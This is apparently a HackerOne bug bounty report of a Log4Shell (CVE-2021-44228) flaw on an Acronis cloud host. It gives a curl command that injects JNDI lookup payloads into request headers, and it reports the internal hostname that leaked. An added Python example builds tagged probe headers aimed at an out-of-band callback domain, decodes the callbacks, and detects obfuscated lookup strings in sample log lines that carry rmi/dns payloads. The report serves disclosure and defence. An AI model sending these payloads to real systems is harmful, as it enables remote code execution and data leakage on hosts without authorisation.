
Acronis: [CVE-2021-44228] Arbitrary Code Execution on ng01-cloud.acronis.com

2022-01-25 07:33:15
mikkocarreon
hackerone.com

Tags: log4j vulnerability, remote command execution, burp collaborator, curl command, vulnerable host, pingback, log4shell, cve-2021-44228, lunasec.io article, impact, bug bounty

CVSS2: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
  Attack Vector: NETWORK; Attack Complexity: MEDIUM; Authentication: NONE
  Confidentiality Impact: COMPLETE; Integrity Impact: COMPLETE; Availability Impact: COMPLETE

CVSS3: 10 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
  Attack Vector: NETWORK; Attack Complexity: LOW; Privileges Required: NONE; User Interaction: NONE; Scope: CHANGED
  Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH

AI Score: 8.8 (Confidence: High)
EPSS: 0.965 (Percentile: 99.6%)

Description

The application is using a vulnerable version of Log4j which allows arbitrary remote command execution. The vulnerability is also known as Log4Shell and is assigned CVE-2021-44228.

Reproduction Steps

For easier reproduction, use Burp Collaborator and issue the following curl command with your Collaborator instance URL in place of <COLLABORATOR_URL>:

curl --http1.1 --silent --output /dev/null \
--header 'User-agent: ${jndi:ldap://${hostName}.<COLLABORATOR_URL>/a}' \
--header 'X-Forwarded-For: ${jndi:ldap://${hostName}.<COLLABORATOR_URL>/a}' \
--header 'Referer: ${jndi:ldap://${hostName}.<COLLABORATOR_URL>/a}' \
https://ng01-cloud.acronis.com

You should receive a request in your Collaborator client with the target server's hostname as the left-most label of the callback: Log4j resolves the nested ${hostName} lookup before it issues the JNDI lookup, so the hostname leaks through the DNS resolution even when the outbound LDAP connection itself is blocked. That should suffice to prove that the host is vulnerable. The hostname I received was ng01-cloud-elk-ls-vm01. Note that the callback proves an unpatched Log4j evaluated the lookup; whether it can be turned into code execution additionally depends on the JVM version and the classes on the application's classpath, so triage from the callback rather than attempting a live payload.

Note that it may take some time to receive the pingbacks. In case Burp Collaborator doesn't work, I'd advise using your own. Some alternatives are:

  1. dig.pm
  2. app.interactsh.com
  3. dnslog.cn
  4. pingb.in
  5. requestbin.net
  6. canarytokens.com
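The probe above puts the same payload in three headers, so a single callback does not tell you which header the vulnerable logger evaluated, and a busy Collaborator domain mixes your callbacks with scanner noise. The following is an added example, not code from the report or from Acronis: it tags each header's payload, decodes a callback name back into the leaked hostname and the triggering header, and, on the defensive side, matches the same lookup syntax (including the ${lower:j} and ${::-j} obfuscations) in access-log lines. CALLBACK_DOMAIN is a placeholder for your own out-of-band domain, and every callback name and log line in the block is constructed for the example.

```python
"""Added example for the Log4Shell out-of-band probe described above.

Not part of the original HackerOne report. CALLBACK_DOMAIN is a placeholder
for your own Collaborator / interactsh domain, and every sample callback and
log line below is constructed for this example.
"""
import re
import secrets
from typing import Optional

CALLBACK_DOMAIN = "collab.example"  # placeholder, replace with your own OOB domain

# The three headers the report injects into, each given a short tag so the
# callback's DNS labels tell you which header the vulnerable logger evaluated.
PROBE_HEADERS = {
    "User-Agent": "ua",
    "X-Forwarded-For": "xff",
    "Referer": "ref",
}
_HEADER_BY_TAG = {tag: name for name, tag in PROBE_HEADERS.items()}


def build_probes(token: Optional[str] = None) -> tuple:
    """Return (token, headers) for one probe run.

    Each value is ${jndi:ldap://${hostName}.<tag>.<token>.<domain>/a}. Log4j
    resolves the inner ${hostName} before issuing the JNDI lookup, so the
    target's hostname becomes the left-most DNS label of the callback.
    """
    token = token or secrets.token_hex(4)
    headers = {
        name: f"${{jndi:ldap://${{hostName}}.{tag}.{token}.{CALLBACK_DOMAIN}/a}}"
        for name, tag in PROBE_HEADERS.items()
    }
    return token, headers


def decode_callback(dns_name: str, token: str) -> Optional[dict]:
    """Map a callback DNS name back to the leaked hostname and triggering header.

    Returns None for names that do not carry our token, e.g. scanner noise or a
    probe from a different run hitting the same domain.
    """
    name = dns_name.rstrip(".").lower()
    suffix = f".{token}.{CALLBACK_DOMAIN}".lower()
    if not name.endswith(suffix):
        return None
    host, sep, tag = name[: -len(suffix)].rpartition(".")
    if not sep or tag not in _HEADER_BY_TAG:
        return None
    return {"hostname": host, "header": _HEADER_BY_TAG[tag]}


# Lookups attackers nest to hide the literal "jndi" from naive filters:
# ${lower:j}, ${upper:J}, and the default-value form ${anything:-j}.
# [^${}] keeps each match to the innermost lookup so nesting resolves inside-out.
_OBFUSCATED_LOOKUP = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"  # ${lower:j} -> j
    r"|\$\{[^${}]*:-([^${}]*)\}",       # ${::-j}, ${env:NOPE:-j} -> j
    re.IGNORECASE,
)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str) -> str:
    """Resolve obfuscating lookups repeatedly until the text stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = _OBFUSCATED_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line carries a JNDI lookup, obfuscated or not."""
    return _JNDI.search(normalize_lookups(line)) is not None


# Constructed access-log lines (not from the report) for the detector.
SAMPLE_LOG = [
    'GET / "Mozilla/5.0 (X11; Linux x86_64)"',
    'GET / "${jndi:ldap://${hostName}.ua.deadbeef.collab.example/a}"',
    'GET /login "${${lower:j}ndi:rmi://203.0.113.7:1099/x}"',
    'GET /api "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.7/t}"',
    'GET /healthz "curl/7.81.0"',
]


def find_probes(lines) -> list:
    """Return (index, line) pairs that carry a JNDI lookup."""
    return [(i, ln) for i, ln in enumerate(lines) if is_log4shell_probe(ln)]


if __name__ == "__main__":
    token, headers = build_probes()
    for name, value in headers.items():
        print(f"--header '{name}: {value}' \\")
    for i, ln in find_probes(SAMPLE_LOG):
        print(f"suspicious line {i}: {ln}")
```

Feed the printed --header lines into the curl command above; when a callback arrives, pass its name and the run's token to decode_callback to see which header the target evaluated. The normalizer only unwraps the lookup forms listed in the comment, so treat a miss as "not matched by this rule", not as clean.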

Reference

https://www.lunasec.io/docs/blog/log4j-zero-day/

Impact

Arbitrary remote code execution
